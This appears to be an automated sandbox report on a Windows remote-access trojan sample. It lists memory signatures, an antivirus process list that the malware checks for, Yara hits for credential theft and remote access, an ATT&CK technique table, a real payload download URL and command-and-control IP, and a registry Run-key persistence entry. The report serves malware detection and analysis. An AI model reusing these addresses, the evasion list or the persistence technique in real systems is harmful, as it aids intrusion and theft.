                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253B242 mov eax, dword ptr fs:[00000030h]0_2_0253B242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C mov eax, dword ptr fs:[00000030h]0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_02474267 mov eax, dword ptr fs:[00000030h] 0_2_02474267
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_0252B276 mov eax, dword ptr fs:[00000030h] 0_2_0252B276
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_0247326C mov eax, dword ptr fs:[00000030h] 0_2_0247326C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_024FF272 mov eax, dword ptr fs:[00000030h] 0_2_024FF272
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_024AD213 mov eax, dword ptr fs:[00000030h] 0_2_024AD213
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_02479237 mov eax, dword ptr fs:[00000030h] 0_2_02479237
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_024F8237 mov ecx, dword ptr fs:[00000030h] 0_2_024F8237
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_0040EABD GetProcessHeap,RtlAllocateHeap,memcpy, 0_2_0040EABD
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: GetProgmanWindow
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: SetProgmanWindow
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_10001667 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,GetLastError,_strcmpi,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError, 0_2_10001667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_00410252 GetLocalTime,lstrlen, 0_2_00410252
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, Code function: 0_2_004110C1 RegisterServiceCtrlHandlerA,Sleep,GetVersionExA,Sleep,GetModuleFileNameA,wsprintfA,CloseHandle,exit,Sleep,Sleep,Sleep, 0_2_004110C1
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                Binary or memory strings found in the sources above (AV process names, one finding each):
                vsserv.exe
                avcenter.exe
                kxetray.exe
                cpf.exe
                avp.exe
                F-PROT.exe
                spidernt.exe
                F-PROT.EXE
                rtvscan.exe
                nspupsvc.exe
                360tray.exe
                ashDisp.exe
                TMBMSRV.exe
                SBAMSvc.exe
                a2guard.exe
                avgwdsvc.exe
                AYAgent.aye
                vsmon.exe
                QUHLPSVC.EXE
                RavMonD.exe
                MsMpEng.exe
                Mcshield.exe
                K7TSecurity.exe

                Stealing of Sensitive Information

                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 131 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 22 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | 1 Replication Through Removable Media | 12 Service Execution | 1 Valid Accounts | 1 Valid Accounts | 3 Obfuscated Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 131 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 23 Windows Service | 11 Access Token Manipulation | 12 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Registry Run Keys / Startup Folder | 23 Windows Service | 1 DLL Side-Loading | NTDS | 216 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 3 Process Injection | 1 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 111 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | Cached Domain Credentials | 341 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 13 Virtualization/Sandbox Evasion | DCSync | 13 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Access Token Manipulation | Proc Filesystem | 13 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 3 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Indicator Removal | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | 66% | ReversingLabs | Win32.Backdoor.Zegost |
SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | 100% | Avira | HEUR/AGEN.1348656 |
SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://106.52.15.123/system.exe | false | | unknown
110.40.45.163 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://106.52.15.123/system.exed | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exe. | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/y | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exeON%L | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exeuNoL | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/ | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exex | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exeW- | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exeC: | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
http://106.52.15.123/system.exez | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/H | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exea | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://106.52.15.123/system.exe? | SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
106.52.15.123 | unknown | China | | 45090 | CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | false
110.40.45.163 | unknown | China | | 59011 | YLWLBeijingYunlinNetworkTechnologyCoLtdCN | true
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1537400
                                              Start date and time:2024-10-18 22:24:14 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 36s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                              Detection:MAL
                                              Classification:mal100.bank.troj.spyw.evad.winEXE@3/1@0/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 87%
                                              • Number of executed functions: 50
                                              • Number of non-executed functions: 354
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for sample files taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Time | Type | Description
16:26:11 | API Interceptor | 10592x Sleep call for process: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe modified
22:25:43 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
22:25:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
106.52.15.123 | MrdWWzWXfM.exe | Get hash | malicious | GhostRat, Nitol, Young Lotus | Browse |
 | oFnrf0WhzT.exe | Get hash | malicious | GhostRat, Nitol, Young Lotus | Browse |
 | D77wDrFT4o.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | BP6F0BLekV.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | iF16cTAvSa.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | file.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | file.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | file.exe | Get hash | malicious | GhostRat, Nitol | Browse |
 | zbvsZwaPi0.exe | Get hash | malicious | Amadey, Raccoon Stealer v2, RedLine, Remcos, SmokeLoader | Browse |
 | K6jbVJCBk1.exe | Get hash | malicious | GhostRat, Nitol | Browse |
                                                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
YLWLBeijingYunlinNetworkTechnologyCoLtdCN | SecuriteInfo.com.Variant.Doina.34323.15716.609.exe | Get hash | malicious | BlackMoon | Browse | 110.40.39.121
 | KlRRP1oBzX.exe | Get hash | malicious | Reverse SSH | Browse | 110.41.185.246
 | mqSWHFHsNJ.exe | Get hash | malicious | Supershell | Browse | 110.40.139.46
 | LisectAVT_2403002A_472.exe | Get hash | malicious | Unknown | Browse | 110.40.35.49
 | LisectAVT_2403002B_221.exe | Get hash | malicious | GhostRat, Nitol | Browse | 110.41.178.66
 | code.exe | Get hash | malicious | Unknown | Browse | 110.41.115.138
 | code.exe | Get hash | malicious | Unknown | Browse | 110.41.115.138
 | 9ic0UJ4Eah.exe | Get hash | malicious | Unknown | Browse | 110.40.42.14
 | aEzkowQO4H.exe | Get hash | malicious | Unknown | Browse | 110.40.35.49
 | yLoLnA3XkD.elf | Get hash | malicious | Mirai | Browse | 110.40.57.197
CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | botnet.mips.elf | Get hash | malicious | Mirai, Moobot | Browse | 140.143.227.154
 | spc.elf | Get hash | malicious | Mirai | Browse | 118.89.114.216
 | sh4.elf | Get hash | malicious | Mirai | Browse | 49.232.220.95
 | armv6l.elf | Get hash | malicious | Unknown | Browse | 129.28.238.255
 | sparc.elf | Get hash | malicious | Mirai | Browse | 123.206.44.255
 | spc.elf | Get hash | malicious | Mirai | Browse | 111.231.39.31
 | m68k.elf | Get hash | malicious | Unknown | Browse | 119.29.176.81
 | VysS7K9PPz.elf | Get hash | malicious | Mirai | Browse | 152.136.201.41
 | siU9XhyR5f.elf | Get hash | malicious | Mirai | Browse | 212.129.191.203
 | na.elf | Get hash | malicious | Mirai | Browse | 49.232.220.93
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):111
                                                                  Entropy (8bit):4.768200862561056
                                                                  Encrypted:false
                                                                  SSDEEP:3:StLl9aaN1135Na2/n6qxUbQl9aaN1135Na2/n6NODd8a:StR9fN1X4bw9fN1XFd8a
                                                                  MD5:3801C8D3ED6B004E9791EB6C185DE13B
                                                                  SHA1:6BCC85C23C2D134FDB83E3D419BBC7A2AEE7DD8A
